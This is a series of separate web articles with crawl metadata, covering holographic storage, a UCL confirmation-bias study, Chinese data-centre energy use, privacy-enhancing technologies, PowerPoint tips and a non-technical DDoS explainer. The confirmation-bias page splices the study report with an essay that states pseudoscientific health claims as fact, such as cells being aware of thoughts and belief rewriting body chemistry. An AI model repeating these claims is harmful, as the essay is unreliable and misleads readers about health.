The argument in favour of holographic storage is quite limited at the moment, and the value proposition is challenging at best. On the plus side, long-term media stability and reliability is a compelling advantage for deep archiving purposes -- discs and tape simply cannot assure reliability out to 50 years. "Discs are very impervious to the elements," says Brian Garrett, at Enterprise Strategy Group (ESG). "I've seen demonstrations where they dip the platters into something boiling and freeze them and roll them around in the mud, clean them up and they're still usable."
Holographic technology also provides portability, allowing the distribution of dense data that cannot be sent conveniently over networks, such as broadcast or high-definition video. The technology should also become more appealing for shorter term backups and archives as companies continue to rely less on tape backups. For example, holographic storage attached to a virtual tape library (VTL) system might be an excellent tape replacement.
On the downside, early holographic storage drives will run in the £10,000 range, with media costing about £100 per disc. Holographic media capacity is also limited to about 300Gbytes. While this capacity is expected to grow substantially over time, it's hard to make a case for a 300Gbyte optical disc against readily available 1Tbyte hard drives or 1.6Tbyte (compressed) LTO-4 tapes without a specific application. Furthermore, the long-term reliability and readability of holographic drives is still unproven.
Holographic recording is also very data sensitive. "With holographic, you have to keep the data streaming," says Greg Schulz, founder and senior analyst at the StorageI/O Group, noting that it's not yet appropriate for partial recordings. This is similar to early CD-R or DVD-R systems that required constant data in the drive's write buffer. If the buffer emptied during a write process, the CD-R or DVD-R recording would fail and the disc would be ruined. It wasn't until much later in the technology's lifecycle that "multi-session" and "burn-proof" techniques were added.
Lesser-known drawbacks to holographic storage include light sensitivity and limited shelf life of unexposed (unrecorded) holographic media. Blank optical CD/DVD media is forgiving in its handling and unrecorded shelf life. On the other hand, blank (unrecorded) holographic media behaves more like unexposed photographic paper. Prematurely exposing the holographic discs to light can expose and ruin them, and the unexposed media only has a shelf life of about three years.
Standards are also a concern. The European Computer Manufacturers Association (ECMA) has published two standards in mid-2007 to address Holographic Versatile Disc (HVD) products, dubbed ECMA-377 and ECMA-378. But holographic storage in general has no substantial standards endorsed by the International Standards Organisation (ISO). This lack of standardisation can work against holographic storage by complicating interoperability between media and drives.
How are holographic drives specified and deployed?
Ultimately, any discussion of holographic storage deployment is theoretical because there are no commercial products available today. Beta products are being evaluated, but manufacturers, like InPhase Technologies, are keeping their beta users under wrap. Consequently, there is no word from the field about value, performance, reliability or any application of holographic products. Still, there are important trends worth noting.
As with most storage devices, the key issues to consider are capacity and data transfer rates. Although holographic storage capacity and performance are currently below current disc and tape systems, they compare favorably to existing optical storage devices. Today, holographic storage media holds 300Gbyte (uncompressed), and beta drives from suppliers, like InPhase, are expected to utilise that media. The InPhase product roadmap touts uncompressed capacities up to 1.6Tbyte over the next few years. Holographic drives, such as the fledgling InPhase Tapestry 300r, cite data rates of 160Mbps. Seek time can be a lengthy 250 milliseconds, and you can expect almost two seconds to load or unload the disc cartridge.
The SLM is a critical part of the overall drive capacity and performance. SLMs in today's early drives use a 1,000 x 1,000 pixel matrix (1 million bits) to modulate laser light and encode each data page. In order to increase storage capacity, SLMs must eventually become finer (offering more bits) and switch faster. This will fit more and larger data pages on each disc and allow the drive to write and read more data per second.
Early generation holographic drives appear positioned as single-disc external products connected to the local area network (Lan) or storage area network (San). As an example, the Tapestry 300r is expected to provide SCSI, 4 Gbps Fibre Channel optical, Gigabit Ethernet, SAS, and iSCSI Ethernet connectivity options, allowing the drive to reside on a wide range of Lan/San architectures. When used with a server, holographic storage devices will invariably require device drivers that correspond to the operating system in use.
Optical storage technologies use lasers for noncontact read/write operations, and holographic drives should also be maintenance free. This is a substantial advantage over tape drives, which require frequent cleaning to remove accumulations of magnetic particles from the read/write heads.
What is the future of holographic storage technology?
The future of holographic storage is fraught with unknowns. "This technology is very promising. I've been hearing about it for years," Garrett says. "But at this point, the No. 1 concerns are [high] cost and [product] immaturity." Experts agree that capacity and performance will only increase over time, moving from 300Gbytes to 800Gbytes and finally on to 1.6Tbytaes over the next 48 months or so. But the pace of improvements will ultimately rest heavily on industry acceptance. Given that holographic technology is currently geared toward a niche in the storage market, it may be years before early product releases give way to more capable and cost-effective systems that appeal to a larger storage audience.
Experts also note the possible introduction of "hybrid" holographic media. Just as magnetic hard drives are starting to incorporate significant quantities of flash or Ram within the disc, near-term holographic storage media may add some amount of flash memory in the cartridge to provide a degree of rewritability until a suitable rewritable media is developed and productised.
Backward compatibility also remains a significant unknown. No tape drive in your enterprise today is capable of reading a tape written 50 years ago, and the same specter is in the cards for holographic storage. For example, the InPhase product roadmap suggests a third generation of holographic drives in roughly four years and promises backward compatibility with the previous two generations. (Back to first generation in this case.) Well, then what? If the fifth or sixth or 10th generation drives cannot read the holographic discs written today, you'll need to either retain the older drive software and hardware, assuming that it still functions, or rewrite the older discs to the newer media later -- defeating the purpose of such long retention. "The same corner case that justifies holographic storage also works against it," Schulz says.
|
<urn:uuid:8e2e6639-dad6-42c3-98c9-3d715d08a991>
|
CC-MAIN-2022-40
|
https://www.computerweekly.com/feature/Holographic-data-storage-the-next-big-thing
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00247.warc.gz
|
en
| 0.935909 | 2,099 | 3.03125 | 3 |
When people are highly confident in a decision, they take in information that confirms their decision, but fail to process information which contradicts it, finds a UCL brain imaging study.
The study, published in Nature Communications, helps to explain the neural processes that contribute to the confirmation bias entrenched in most people’s thought processes.
Lead author, Ph.D. candidate Max Rollwage (Wellcome Centre for Human Neuroimaging at UCL and Max Planck UCL Centre for Computational Psychiatry & Ageing Research) said: “We were interested in the cognitive and neural mechanisms causing people to ignore information that contradicts their beliefs, a phenomenon known as confirmation bias.
For example, climate change sceptics might ignore scientific evidence that indicates the existence of global warming.
“While psychologists have long known about this bias, the underlying mechanisms were not yet understood.
“Our study found that our brains become blind to contrary evidence when we are highly confident, which might explain why we don’t change our minds in light of new information.”
For the study, 75 participants conducted a simple task: they had to judge whether a cloud of dots was moving to the left or right side of a computer screen.
They then had to give a confidence rating (how certain they were in their response), on a sliding scale from 50% sure to 100% certain.
After this initial decision, they were shown the moving dots again and asked to make a final decision. The information was made even clearer the second time and could help participants to change their mind if they had initially made a mistake.
However, when people were confident in their initial decision, they rarely used this new information to correct their errors.
25 of the participants were also asked to complete the experiment in a magnetoencephalography (MEG) brain scanner.
The researchers monitored their brain activity as they processed the motion of the dots.
Based on this brain activity, the researchers evaluated the degree to which participants processed the newly presented information. When people were not very confident in their initial choice, they integrated the new evidence accurately.
However, when participants were highly confident in their initial choice, their brains were practically blind to information that contradicted their decision but remained sensitive to information that confirmed their choice.
The researchers say that in real-world scenarios where people are more motivated to stand by their beliefs, the effect may be even stronger.
Senior author Dr. Steve Fleming (Wellcome Centre for Human Neuroimaging at UCL, Max Planck UCL Centre for Computational Psychiatry & Ageing Research and UCL Experimental Psychology) said: “Confirmation bias is often investigated in scenarios that involve complex decisions about issues such as politics.
However, the complexity of such opinions makes it difficult to disentangle the various contributing factors to the bias, such as wanting to maintain self-consistency with our friends or social group.
“By using simple perceptual tasks, we were able to minimise such motivational or social influences and pin down drivers of altered evidence processing that contribute to confirmation bias.”
In a previous, related study, the research team had found that people who hold radical political views—at either end of the political spectrum – aren’t as good as moderates at knowing when they’re wrong, even about something unrelated to politics.
Because the neural pathways involved in making a perceptual decision are well understood in such simple tasks, this makes it possible for researchers to monitor the relevant brain processes involved.
The researchers highlight that an understanding of the mechanism that causes confirmation bias may help in developing interventions that could reduce people’s blindness to contradictory information.
Max Rollwage added: “These results are especially exciting to me, as a detailed understanding of the neural mechanisms behind confirmation bias opens up opportunities for developing evidence-based interventions.
For instance, the role of inaccurate confidence in promoting confirmation bias indicates that training people to boost their self-awareness may help them to make better decisions.”
Beliefs are basically the guiding principles in life that provide direction and meaning in life. Beliefs are the preset, organized filters to our perceptions of the world (external and internal). Beliefs are like ‘Internal commands’ to the brain as to how to represent what is happening, when we congruently believe something to be true. In the absence of beliefs or inability to tap into them, people feel disempowered.
Beliefs originate from what we hear – and keep on hearing from others, ever since we were children (and even before that!). The sources of beliefs include environment, events, knowledge, past experiences, visualization etc.
One of the biggest misconceptions people often harbor is that belief is a static, intellectual concept. Nothing can be farther from truth! Beliefs are a choice. We have the power to choose our beliefs. Our beliefs become our reality.
Beliefs are not just cold mental premises, but are ‘hot stuff’ intertwined with emotions (conscious or unconscious). Perhaps, that is why we feel threatened or react with sometimes uncalled for aggression, when we believe our beliefs are being challenged!
Research findings have repeatedly pointed out that the emotional brain is no longer confined to the classical locales of the hippocampus, amygdala and hypothalamus. The sensory inputs we receive from the environment undergo a filtering process as they travel across one or more synapses, ultimately reaching the area of higher processing, like the frontal lobes.
There, the sensory information enters our conscious awareness. What portion of this sensory information enters is determined by our beliefs. Fortunately for us, receptors on the cell membranes are flexible, which can alter in sensitivity and conformation.
In other words, even when we feel stuck ‘emotionally’, there is always a biochemical potential for change and possible growth. When we choose to change our thoughts (bursts of neurochemicals!), we become open and receptive to other pieces of sensory information hitherto blocked by our beliefs!
When we change our thinking, we change our beliefs. When we change our beliefs, we change our behavior.
A mention of the ‘Placebo’ is most appropriate at this juncture. Medical history is replete with numerous reported cases where placebos were found to have a profound effect on a variety of disorders.
One such astounding case was that of a woman suffering from severe nausea and vomiting. Objective measurements of her gastric contractions indicated a disrupted pattern matching the condition she complained of.
Then a ‘new, magical, extremely potent’ drug was offered to her, which would, the doctors proclaimed, undoubtedly cure her nausea.
Within a few minutes, her nausea vanished! The very same gastric tests now revealed normal pattern, when, in actuality, she had been given syrup of ipecac, a substance usually used to induce nausea!
When the syrup was presented to her, paired with the strong suggestion of relief of nausea, by an authority figure, it acted as a (command) message to the brain that triggered a cascade of self-regulatory biochemical responses within the body.
This instance dramatically demonstrates that the influence of placebo could be more potent than expected drug effect.
An important observation was that, part of the placebo response seemed to involve the meaning of the disorder or the illness to the individual. In other words, the person’s belief or how she/he interprets (inter-presents or internally represents) directly governs the biological response or behavior. Another remarkable study involved a schizophrenic.
This woman was observed to have split personality. Under normal conditions, her blood glucose levels were normal. However, the moment she believed she was diabetic, her entire physiology changed to become that of a diabetic, including elevated blood glucose levels.
Suggestions or symbolic messages shape beliefs that in turn affect our physical well being. Several cases of ‘Disappearance of warts’ have been reported by Ornstein and Sobel wherein they ponder on how the brain translates the suggestions (sometimes using hypnosis) into systematic biochemical battle strategies such as chemical messengers sent to enlist the aid of immune cells in an assault on the microbe-induced miniature tumor or probably small arteries are selectively constricted, cutting off the vital nutrient supply to warts but not touching the neighboring healthy cells.
Findings of carefully designed research indicate that our interpretation of what we are seeing (experiencing) can literally alter our physiology. In fact, all symptoms of medicine work through our beliefs.
By subtly transforming the unknown (disease/disorder) into something known, named, tamed and explained, alarm reactions in the brain can be calmed down. All therapies have a hidden, symbolic value and influence on the psyche, besides the direct specific effect they may have on the body.
Just as amazingly life-affirming placebos are, the reverse, “Nocebo’ has been observed to be playing its part too. It is associated with negative, life-threatening or disempowering beliefs.
Arthur Barsky, a psychiatrist states that it is the patient’s expectations – beliefs whether a drug or procedure works or will have side effects – that plays a crucial role in the outcome.
The biochemistry of our body stems from our awareness. Belief-reinforced awareness becomes our biochemistry. Each and every tiny cell in our body is perfectly and absolutely aware of our thoughts, feelings and of course, our beliefs.
There is a beautiful saying ‘Nobody grows old. When people stop growing, they become old’. If you believe you are fragile, the biochemistry of your body unquestionably obeys and manifests it.
If you believe you are tough (irrespective of your weight and bone density!), your body undeniably mirrors it. When you believe you are depressed (more precisely, when you become consciously aware of your ‘Being depressed’), you stamp the raw data received through your sense organs, with a judgment – that is your personal view – and physically become the ‘interpretation’ as you internalize it.
A classic example is ‘Psychosocial dwarfism’, wherein children who feel and believe that they are unloved, translate the perceived lack of love into depleted levels of growth hormone, in contrast to the strongly held view that growth hormone is released according to a preprogrammed schedule coded into the individual’s genes!
Providing scientific evidence to support a holistic approach to well being and healthcare, Bruce Lipton sheds light on mechanism underlying healing at cellular level. He emphasizes that ‘love’ is the most healing emotion and ‘placebo’ effect accounts for a substantial percentage of any drug’s action, underscoring the significance of beliefs in health and sickness.
According to him, as adults, we still believe in and act our lives out based on information we absorbed as children (pathetic indeed!). And the good news is, we can do something about the ‘tape’ our subconscious mind is playing (ol’ silly beliefs) and change them NOW.
Further recent literature evidences provided knowledge based on scientific principles of biology of belief. There are limited studies on clinics of traditional beliefs and if we get more scientific data, we can use these traditional systems in clinical mental health management.
Human belief system is formed by all the experiences learned and experimented filtered through personality. The senses to capture inner and outer perceptions have higher brain potentials.
Some questions that arise in this context are, does the integration and acceptance of these perceptions result in the establishment of beliefs?
Does the establishment of these beliefs depend on proof demonstrations?
The proofs might be the perceptions, which we can directly see or having scientific proof or custom or faith.[8,9] Beliefs are developed as stimuli received as trusted information and stored in the memory.
These perceptions are generalized and established into belief. These beliefs are involved in the moral judgment of the person. Beliefs help in decision-making. Bogousslavsky and Inglin explained that, how some physicians were more successful by taking an account of patient beliefs.
Beliefs influence factors involved in the development of psychopathology. They also influence the cognitive and emotional assessment, addictiveness, responses to false positives and persistent normal defensive reactions.
Total brain function is required in stabilizing the belief and in responding to environmental system. Some of the brain regions and the neural circuits are very important in establishing beliefs and executing emotions.
Frontal lobes play a major role in beliefs. Mental representations of the world are integrated with sub-cortical information by prefrontal cortex.
Amygdala and Hippocampus are involved in the process of thinking and thus help in execution of beliefs. NMDA receptor is involved in thinking and in the development of beliefs. These beliefs are subjected to challenge. A belief that is subjected to more challenges becomes stronger. When a new stimulus comes, it creates distress in the brain with already existing patterns.
The distress results in the release of dopamine (neurotransmitter) to transmit the signal.[10,11] Research findings of Young and Saxe (2008) revealed that medial prefrontal cortex is involved in processing the belief valence. Right temporoparietal junction and precuneus are involved in the processing of beliefs to moral judgment.
True beliefs are processed through right temporoparietal junction.[13,14] Saxe (2006) explained that beliefs judging starts at the age of five years citing example of judging of belief questions on short stories by the children.
Belief attribution involved activating regions of medial prefrontal cortex, superior temporal gyri and hippocampal regions. Studies by Krummenacher et al, have shown that dopamine levels are associated with paranormal thoughts suggesting the role of dopamine in belief development in the brain.
Flannelly et al, illustrated on how primitive brain mechanisms that evolved to assess environmental threats in related psychiatric disorders. Also were highlighted the issues such as the way beliefs can affect psychiatric symptoms through these brain systems.
The theories discussed widely are related to (a) link psychiatric disorders to threat assessment and (b) explain how the normal functioning of threat assessment systems can become pathological.
It is proposed that three brain structures are implicated in brain disorders in response to threat assessment and self-defense: the regions are the prefrontal cortex, the basal ganglia and parts of limbic system.
The functionality of these regions has great potential to understand mechanism of belief formation and its relevance in neurological functions/dysfunctions. Now it is clear that biology and physiology of belief is an open area for research both at basic and clinical level.
The future directions are to develop validated experimental or sound theoretical interpretation to make ‘BELIEF’ as a potential clinical management tool.
Perceptual shifts are the prerequisites for changing the belief and hence changing the biochemistry of our body favorably. Our innate desire and willingness to learn and grow lead to newer perceptions.
When we consciously allow newer perceptions to enter the brain by seeking new experiences, learning new skills and changed perspectives, our body can respond in newer ways –this is the true secret of youth.
Beliefs (internal representations/interpretations) thus hold the magic wand of remarkable transformations in our biochemical profile. If you are chasing joy and peace all the time everywhere but exclaim exhausted, ‘Oh, it’s to be found nowhere!’, why not change your interpretation of NOWHERE to ‘NOW HERE’; just by introducing a gap, you change your awareness – that changes your belief and that changes your biochemistry in an instant!
Everything exists as a ‘Matrix of pure possibilities’ akin to ‘formless’ molten wax or moldable soft clay. We shape them into anything we desire by choosing to do so, prompted, dictated (consciously or unconsciously) by our beliefs.
The awareness that we are part of these ever-changing fields of energy that constantly interact with one another is what gives us the key hitherto elusive, to unlock the immense power within us. And it is our awareness of this awesome truth that changes everything. Then we transform ourselves from passive onlookers to powerful creators. Our beliefs provide the script to write or re-write the code of our reality.
Thoughts and beliefs are an integral part of the brain’s operations. Neurotransmitters could be termed the ‘words’ brain uses to communicate with exchange of information occurring constantly, mediated by these molecular messengers.
Unraveling the mystery of this molecular music induced by the magic of beliefs, dramatically influencing the biochemistry of brain could be an exciting adventure and a worth pursuing cerebral challenge.
1. Candace Pert. Molecules of emotion: Why you feel the way you feel. New York, USA: Scribner Publications; 2003. ISBN-10: 0684846349. [Google Scholar]
2. Ornstein R, Sobel D. The healing brain: Breakthrough discoveries about how the brain keeps us healthy. USA: Malor Books; 1999. ISBN-10: 1883536170. [Google Scholar]
3. Robbins A. Unlimited power: The new science of personal excellence. UK: Simon and Schuster; 1986. ISBN 0-7434-0939-6. [Google Scholar]
4. Braden G. The spontaneous healing of belief. Hay House Publishers (India) Pvt. Ltd; 2008. ISBN 978-81-89988-39-5. [Google Scholar]
5. Chopra D. Ageless body, timeless mind: The quantum alternative to growing old. Hormony Publishers; 1994. ISBN -10: 0517882124. [Google Scholar]
6. Lipton B. The biology of belief: Unleashing the power of consciousness, matter and miracles. Mountain of Love Publishers; 2005. ISBN 978-0975991473. [Google Scholar]7. Bogousslavsky J, Inglin M. Beliefs and the brain. Eur Neurol. 2007;58:129–32. [PubMed] [Google Scholar]
13. Aichhorn M, Perner J, Weiss B, Kronbichler M, Staffen W, Ladurner G. Temporo-parietal junction activity in theory-of-mind tasks: Falseness, beliefs, or attention. J Cogn Neurosci. 2009;21:1179–92. [PubMed] [Google Scholar]
14. Abraham A, Rakoczy H, Werning M, von Cramon DY, Schubotz RI. Matching mind to world and vice versa: Functional dissociations between belief and desire mental state processing. Soc Neurosci. 2009;1:18. [PubMed] [Google Scholar]
More information: Max Rollwage et al, Confidence drives a neural confirmation bias, Nature Communications (2020). DOI: 10.1038/s41467-020-16278-6
|
<urn:uuid:961b9406-53ce-4880-9b90-3ba320d961d0>
|
CC-MAIN-2022-40
|
https://debuglies.com/2020/05/28/strong-beliefs-entrenched-can-blind-us-to-information-that-challenges-them/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00247.warc.gz
|
en
| 0.928129 | 3,924 | 3.328125 | 3 |
Chinese data centers use enough electricity for two countries
While companies around the world work hard to green up their data centers, a recent report has brought Chinese data centers into question.
An Environmental 360 report suggests that the country's data centers alone consume more electricity than all of Hungary and Greece combined.
The report notes that with China's electricity produced mainly from coal, every WeChat message Chinese citizens send helps to speed up global warming.
It also says that a large amount of water is being used to cool data centers, worsening the situation in an already ‘water-stressed nation'.
Alibaba Group are amongst the initiatives noted on the report who are utilizing natural water bodies for cooling for their data center located in Hangzhou, next to eastern China's Qiandao Lake.
Another point of interest of the report is that while the Chinese central government has yet to cap the amount of electricity and water that domestic data centers can use, some cities have made it clear that they don't welcome water-intensive, energy-guzzling computing facilities.
Beijing is one of those cities as any center that has a power usage effectiveness rating above 1.5 is not allowed to operate there.
According to the report, most data centers in China have a rating of 2.2. However, companies like Google are working to change data centers for good.
Recently, the company partnered up with Google Deepmind to implement a system that reduces data center cooling bills and overall energy consumption.
Digital Realty Trust also recently agreed to purchase enough wind power to offset all of the energy spent in its colocation and interconnection facilities across the States.
There may be hope for us all yet..
|
<urn:uuid:c4e33cd5-af61-49e4-93bf-be05bd0b5919>
|
CC-MAIN-2022-40
|
https://datacenternews.asia/story/chinese-data-centers-use-enough-electricity-two-countries
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00447.warc.gz
|
en
| 0.960209 | 343 | 2.734375 | 3 |
As data continues to grow exponentially, so does its potential to derive value. Ensuring that the data sets remain private compounds our ability to learn and gain insights from the wealth of data at our disposal. Privacy Enhancing Technologies (PETs) enable data scientists to derive powerful insights from large, valuable data sets without deleting or exposing sensitive records, in order to protect privacy and remain compliant.
In this blog, we will dive into six most common privacy enhancing technologies, as well as two additional tools that fall under the PETs umbrella.
(PET) Privacy Enhancing Technologies: The Classics
The exact definition of (PET) privacy enhancing technologies is still under debate. Generally speaking, privacy enhancing technologies include any technology (whether software or hardware) that allows sensitive data to be computed on, without revealing the underlying data. How this is achieved differs for each technique, whether it is software or hardware based, and the intended use.
For this subset, we defined “classic” privacy enhancing technologies as techniques, architecture, or infrastructure that does not modify the original inputs. Here are the top six classic privacy enhancing technologies:
|Homomorphic Encryption||Data and/or models encrypted at rest, in transit, and in use (ensuring sensitive data never needs to be decrypted), but still enables analysis of that data.|
|Multiparty Computation||Allows multiple parties to perform joint computations on individual inputs without revealing the underlying data between them.|
|Differential Privacy||Data aggregation method that adds randomized “noise” to the data; data cannot be reverse engineered to understand the original inputs.|
|Federated Learning||Statistical analysis or model training on decentralized data sets; a traveling algorithm where the model gets “smarter” with every analysis of the data.|
|Secure Enclave/Trusted Execution Environment||A physically isolated execution environment, usually a secure area of a main processor, that guarantees code and data loaded inside to be protected.|
|Zero-Knowledge Proofs||Cryptographic method by which one party can prove to another party that a given statement is true without conveying any additional information apart from the fact that the statement is indeed true.|
What is homomorphic encryption: a method which allows data to be computed on while it is still encrypted. Data and/or models are encrypted at all points in the data lifecycle: in rest, in transit, and in use.
What is homomorphic encryption used for: Computations and/or model training on sensitive data – especially between a data owner (or owners) and third parties; deploying encrypted models.
Drawbacks: Works best on structured data, requires customization of analytics, computationally expensive
What is multiparty computation: Cryptography that allows multiple parties to perform joint computations on individual inputs without revealing the underlying data between them.
What is multiparty computation used for: Benchmarking on different data sets to produce an aggregated result.
Drawbacks: Parties can infer sensitive data from the output; each deployment requires a completely custom set up; costs are often high due to communication requirements.
What is differential privacy: A data aggregation method which adds randomized “noise” to the data; data cannot be reverse engineered to understand the original inputs.
What is differential privacy used for: Providing directionally correct statistical analysis, but not accurate or precise information.
Drawbacks: Limit to the number of and type of computations which can be performed – i.e., a reduction in data utility.
What is federated learning: Federated Learning enables statistical analysis or model training on decentralized data sets via a “traveling algorithm” where the model gets “smarter” with every new analysis of the data.
What is federated learning used for: Secure model training or analysis on decentralized data sets. Learning from user inputs on mobile devices (e.g., spelling errors and auto-completing words) to train a model.
Drawbacks: Federated Learning has generated some hype, specifically since Google began embarking on research into incorporating FL into its AI.
Unfortunately, there are many drawbacks:
- Debatable privacy benefits:
- It is possible to reverse engineer the underlying data sets based on metadata revealed by the model once it’s complete
- Model known by all collaborating parties
- A large volume of data is required to gain insights
- High maintenance time investment: it’s complex to manage FL over distributed systems
Secure Enclave/Trusted Execution Environment
What is a secure enclave/trusted execution environment : A physically isolated execution environment, usually a secure area of a main processor, that guarantees code and data loaded inside to be protected.
What are secure enclave/trusted execution environments used for: Computations on sensitive data.
Drawbacks: Hardware dependent – i.e., trust is placed in the specific chip, not in the math used to encrypt and decrypt the data; data not encrypted while in the TEE.
What are zero-knowledge proofs: Two different parties can prove to one another that they know something about data without revealing the underlying data itself. (Prof. Shafi Goldwasser, invented ZKPs along with Silvio Micali and Charles Rackoff in 1985, which earned them a Turing Award in 2012.)
What are zero-knowledge proofs used for: Providing privacy to public blockchains; online voting; authentication.
Data Privacy Tools Sometimes Categorized as Privacy Enhancing Technologies (PET)
Some listings of privacy enhancing technologies include data privacy tools which change the input data to conform to regulations (e.g., HIPAA) regarding Personally Identifiable Information (PII). We list them separately here because of a significant drawback: data devaluation. Changing or deleting data using one of the two techniques below enhances privacy, but also significantly degrades the quality of the data – and ultimately reduces the value of insights that can be drawn from it. By being unable to perform precise calculations on altered data, valuable insights are lost with every computation.
|Synthetic Data||Artificially created data which is meant to represent real-world sensitive data.|
|Anonymized (De-identified) Data||Strips data of PII using techniques like deleting or masking personal identifiers with hashing, suppressing, or generalizing quasi-identifiers.|
What is synthetic data: Fully algorithmically generated data produced by a computer simulation that approximates a real data set.
What it is used for: Reducing constraints on using sensitive data in highly regulated industries or for software testing.
Drawbacks: Cannot do precise, accurate computations on individual data points; cannot be linked to real data.
Anonymized (De-identified) Data
What is anonymized data: Strips data of PII using various techniques to delete or mask personal identifiers.
What it is used for: Computations on sensitive data.
Drawbacks: Cannot do precise, accurate computations on individual data points; inability to link data sets; possible to re-identify PII. For example, in 2010, Netflix de-identified viewer data before sharing it publicly with contest participants for its Recommendation Contest. Hackers managed to re-identify some customers, resulting in a $1M lawsuit.
Choose PET Privacy Enhancing Solutions Based on Use Cases
As we have seen, some privacy enhancing technologies are better than others for specific use cases – whether that is statistical analysis or model training and tuning (combining Privacy Enhancing Technologies provides even more benefits.) But even in cases where the data itself is being changed, choosing to add extra layers of privacy to your data lifecycle is invaluable to your business: PETs, as a whole, are estimated to be able to unlock between $1.1T and $2.9T of value in underutilized data. So whether you have chosen to deploy one of the PETs listed above or chosen to combine PETs for even more benefits, you are on the path to realizing the value of your data.
Want to learn more? Join us for our webinar on “Maximizing the Value of Your Data.”
|
<urn:uuid:8001699f-7ebe-4a09-9128-052fe68854b0>
|
CC-MAIN-2022-40
|
https://dualitytech.com/pet-privacy-enhancing-technologies-need-to-know/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00447.warc.gz
|
en
| 0.889662 | 1,725 | 2.546875 | 3 |
Are you tired of creating mediocre PowerPoint presentations? Are you ready to make the most out of this useful program? Step out of your boundaries and use some of these tips to make the most interesting and visually appealing PowerPoint ever!
PowerPoint 2013 has all the tools to get you started in creating an impressive presentation. With its new graphic features and updates to old ones, you will have everything you need to produce a visually stimulating presentation that won’t have your colleagues dosing off to sleep. Here are some tutorials on how to create and format basic shapes, merge shapes, and add some special effects to your presentation.
Create & Format Shapes
Start by opening a blank canvas. This can be done by opening PowerPoint and selecting the Blank Presentation slide. In the next boxes that appear select the CTRL key and the boxes, now press delete. Now you have a blank canvas.
- From the Drawing group on the Home tab, select Shapes, then select the second shape under Rectangles.
- The cursor will become a cross, now simply hold the left mouse button and drag down and over to draw the shape you selected. Once you release the left mouse button the shape will appear.
- To format the shape, place your cursor on the shape and right-click. Now select the Fill icon from the Shortcut menu and choose a gradient from the Theme Colors > Gradient window.
- To make positioning graphics easier, select the View tab, and check Rulers and Gridlines so that they appear. Now click your rectangle and press CTRL-C and then CTRL-V to paste it seven times. Position the eight rectangles at the top and bottom of the slide.
- Select a color range for the top row, and a different one for the bottom row from the Shape Styles group in the Format tab. Convert all eight colors to gradients.
Merge Shapes: splice & dice
- Copy each rectangle on the first row to the center, and then do the same for the bottom row. Overlap the bottom rectangles to the top ones. Click the first rectangle, and then hold down the CTRL key to select the overlapping rectangle. Now the Format tab is available.
- Click the Format tab and select Merge Shapes under the Insert Shapes group. From the dropdown menu, select Union. Now the highlighted shapes become one shape.
- You can follow the same steps in the dropdown menu to Combine the shapes, Fragment them, Intersect, or Subtract them.
With these cool new features you can create any shape or look you want just by combining, joining, or dividing the basic shape provided.
Add Special Effects
Now that you know how to create basic shapes and format them into new shapes, use these cool 3D features to make your shapes pop right off the page. With the use of lighting, shadows, and reflections, you can start to make things look more realistic and fun!
- From the Home tab, select Shapes from the Drawing group and select any shape. Draw the shape down to cover four grid squares.
- With the shapes active, select Shape Fill from the Drawing group under Home. Under Theme Colors, select More Fill Colors. Select any color, and then change the transparency to 35%. Now select Shape Outline to turn off the outline.
- Now learn how to turn a circle into a sphere. Right click the circle you made and select Format Shape from the shortcut menu. Under Shape Options, select Effects. Scroll down to the 3D section and click Top Bevel. Choose Circle and set the height and width to 72pts.
- To add material and lighting effects, while the sphere is still selected choose the Material button from the 3D section of the Format Shape menu. Now select the Warm Matte icon. Now you have a sphere with soft lighting and a matte finish. This looks more realistic and eye-popping!
- Experiment with Format Shape from the shortcut menu to add other effects like shadows and reflections.
There are endless possibilities to be experimented with on PowerPoint 2013, so play around with the settings and produce a spectacular presentation for your business needs. The more visually stimulating your presentation, the better results and reception you will receive.
For more information on how to use PowerPoint 2013 to produce an effective presentation for your business needs, contact our team at ✅ ECW Network & IT Solutions - Managed IT Services In Fort Lauderdale. You can call us at (561) 306-2284 or send us an email at [email protected]. We will help ensure your presentation stands out from the crowd!
|
<urn:uuid:a5775c07-8874-4851-85ed-18e047c3b3ac>
|
CC-MAIN-2022-40
|
https://www.ecwcomputers.com/three-features-that-will-make-your-powerpoint-presentation-stand-out-from-the-crowd/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00447.warc.gz
|
en
| 0.849724 | 946 | 3.21875 | 3 |
The ‘distributed’ nature of DDoS refers to the fact that they emanate from different locations
The word Meris (Latvian for plague) will make any cybersecurity expert sit up. Staying true to its name, Meris has wreaked havoc by targeting thousands of computers worldwide since last year. The scale and sophistication of the distributed denial-of-service (DDoS) attacks launched by the new botnet, drawing power from compromised Internet of Things (IoT) devices, personal computers, routers, and home gadgets, is unprecedented. Meris is not the first and won’t be the last. DDoS attacks are here to stay and evolving steadily to pose a major threat to a world heavily reliant on digital communications – a fact reinforced in the Nokia Deepfield Network Intelligence report: DDos in 2021.
What is DDoS?
As the internet brings billions of devices online, thousands of common vulnerabilities and exposures (CVEs) get discovered and, while waiting to get fixed, become available to be exploited by hackers and cybercriminals. DDoS is another type of IP network traffic – albeit a malicious kind that has been around for over two decades. It has been used to disrupt servers, services, or even entire networks by saturating them with a high volume of traffic, high intensity of packets, and flooding internet systems and devices with a high frequency of malformed requests to confuse or render them inoperable. The ‘distributed’ nature of DDoS refers to the fact that they emanate from different locations, sometimes hard to be tracked back because of IP spoofing – techniques used to hide originating IP addresses.
In recent times, at the core of most DDoS attacks are botnets. A botnet is a collection of compromised sets of individual devices like home computers, routers, IP cameras, digital video recorders (DVRs) and even parking meters. The end devices are commonly called bots or zombies because they have been taken over by hackers. The infected machines are usually triggered into action from a command center, a compromised server or a remote computer used by a hacker or cybercriminal.
DDoS is not a new concept and has been exploiting IP protocol and systems vulnerabilities for years. Some protocols, such as Domain Name System (DNS), have gained additional security features though these have not been deployed extensively or universally. However, many protocols still rely on open principles set by the internet community a long time ago. Some of them never envisaged malicious exploits that could jeopardize the intended operation of router-based networks.
